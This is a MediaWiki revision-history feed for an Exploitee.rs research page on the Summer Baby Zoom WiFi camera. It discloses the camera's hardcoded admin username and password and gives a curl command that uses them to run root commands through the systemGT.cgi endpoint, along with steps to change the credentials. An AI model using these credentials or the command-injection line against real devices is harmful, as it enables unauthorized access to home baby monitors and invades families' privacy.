https://www.Exploitee.rs/index.php?title=Summer_Baby_Zoom_WiFi%E2%80%8B%E2%80%8B&feed=atom&action=history
Summer Baby Zoom WiFi - Revision history
2024-03-28T22:55:28Z
Revision history for this page on the wiki
MediaWiki 1.37.2
https://www.Exploitee.rs/index.php?title=Summer_Baby_Zoom_WiFi%E2%80%8B%E2%80%8B&diff=2580&oldid=prev
Resno: Text replacement - "gtvcom-20" to "exploiteers-20"
2016-02-07T01:22:41Z
<p>Text replacement - "gtvcom-20" to "exploiteers-20"</p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 01:22, 7 February 2016</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l7">Line 7:</td>
<td colspan="2" class="diff-lineno">Line 7:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Purchase ==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Purchase ==</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>[http://www.amazon.com/gp/product/B00F5QTESS/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00F5QTESS&linkCode=as2&tag=<del style="font-weight: bold; text-decoration: none;">gtvcom</del>-20&linkId=LJH4EXDN4ZQDM3FY Purchase the Summer Baby Zoom WiFi Camera at Amazon]</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>[http://www.amazon.com/gp/product/B00F5QTESS/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00F5QTESS&linkCode=as2&tag=<ins style="font-weight: bold; text-decoration: none;">exploiteers</ins>-20&linkId=LJH4EXDN4ZQDM3FY Purchase the Summer Baby Zoom WiFi Camera at Amazon]</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Disassembly ==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Disassembly ==</div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2223:rev-2580 -->
</table>
Resno
https://www.Exploitee.rs/index.php?title=Summer_Baby_Zoom_WiFi%E2%80%8B%E2%80%8B&diff=2223&oldid=prev
Zenofex at 10:23, 17 August 2014
2014-08-17T10:23:11Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 10:23, 17 August 2014</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l43">Line 43:</td>
<td colspan="2" class="diff-lineno">Line 43:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=COMMANDHERE"</pre></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=COMMANDHERE"</pre></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">== Demo ==</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">{{#ev:youtube|nvdoHAWX5aA}}</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Fixing "Hard Coded" Credentials ==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Fixing "Hard Coded" Credentials ==</div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l51">Line 51:</td>
<td colspan="2" class="diff-lineno">Line 55:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Commit password changes made above.<pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram commit"</pre></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Commit password changes made above.<pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram commit"</pre></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Finished!</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Finished!</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"></del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;">== Demo ==</del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;">{{#ev:youtube|nvdoHAWX5aA}}</del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2222:rev-2223 -->
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Summer_Baby_Zoom_WiFi%E2%80%8B%E2%80%8B&diff=2222&oldid=prev
Zenofex at 10:22, 17 August 2014
2014-08-17T10:22:47Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 10:22, 17 August 2014</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l51">Line 51:</td>
<td colspan="2" class="diff-lineno">Line 51:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Commit password changes made above.<pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram commit"</pre></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Commit password changes made above.<pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram commit"</pre></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Finished!</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Finished!</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">== Demo ==</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">{{#ev:youtube|nvdoHAWX5aA}}</ins></div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2186:rev-2222 -->
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Summer_Baby_Zoom_WiFi%E2%80%8B%E2%80%8B&diff=2186&oldid=prev
Zenofex: 1 revision: Moving from DC22 to main site.
2014-08-17T08:22:41Z
<p>1 revision: Moving from DC22 to main site.</p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 08:22, 17 August 2014</td>
</tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2185:rev-2186 -->
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Summer_Baby_Zoom_WiFi%E2%80%8B%E2%80%8B&diff=2185&oldid=prev
Zenofex at 15:37, 5 August 2014
2014-08-05T15:37:39Z
<p></p>
<p><b>New page</b></p><div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Summer_Baby_Zoom_WiFi.jpg|200px|left|thumb]]<br />
[[Category:Cameras]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the Summer Baby Zoom WiFi Camera.<br />
<br />
== Purchase ==<br />
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.<br />
[http://www.amazon.com/gp/product/B00F5QTESS/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00F5QTESS&linkCode=as2&tag=gtvcom-20&linkId=LJH4EXDN4ZQDM3FY Purchase the Summer Baby Zoom WiFi Camera at Amazon]<br />
<br />
== Disassembly ==<br />
<br />
== UART ==<br />
The pin-out for UART can be found on the images below.<br />
<gallery><br />
File:SummerBabyZoomWiFi-UART.jpg<br />
</gallery><br />
<br />
== Hardcoded MFG Credentials ==<br />
<br />
The Summer Baby Zoom WiFi has an administrative username and password that can be used to access the cam and which does not change. This set of credentials is one of 3 sets with the other 2 being specific to the camera itself and matching the password listed on the camera.<br />
<br />
* '''Hardcoded Username''': <code>MsC@dm1n!</code><br />
* '''Hardcoded Password''': <code>Auth3nt1c@T3</code><br />
<br />
[[File:Summer_Baby_Zoom_WiFi_Hardcoded_Credentials.png|800px]]<br />
<br />
'''Other Accounts'''<br />
<br />
The two accounts which use the password listed on the camera are:<br />
<br />
* '''Normal Priviledged Username''': <code>V13w3r</code><br />
* '''Admin Username''': <code>SnApAdm1n</code><br />
<br />
[[File:Summer_Baby_Zoom_WiFi_Hardcoded_Credentials_2.png|400px]]<br />
<br />
== Command Execution Through systemGT.cgi ==<br />
The "systemGT.cgi" script contains a method of executing commands as a root user on the Summer BabyZoom WiFi. <br />
<br />
[[File:Summer_BabyZoom_WiFi_Command_Execution.png|400px|disassembly from a systemGT handling function from "/bin/mini_httpd"]]<br />
<br />
In the image above you can see that the value supplied within the posted "systemGT" variable is combined with an ampersand and executed with the imported "system" function call. This allows us to use the following curl call to execute commands remotely on the device.<br />
<br />
<pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=COMMANDHERE"</pre><br />
<br />
== Fixing "Hard Coded" Credentials ==<br />
Since the credentials are stored in nvram the process to change them is easy but could lead to some issues with the main binary that runs on the device. However if you wish to proceed the process is simple and can be done leveraging the systemGT script.<br />
<br />
To fix follow these instructions:<br />
# On a Linux or OSX machine enter the following command to change the password to your desired password. <pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram set UserSetSetting.userList.users1.password%3DNEW_PASSWORD_HERE"</pre><br />
# Commit password changes made above.<pre>curl -u 'MsC@dm1n!:Auth3nt1c@T3' "http://<IP-OF-CAMERA/cgi-bin/systemGT.cgi" -d "systemGT=nvram commit"</pre><br />
# Finished!</div>
Zenofex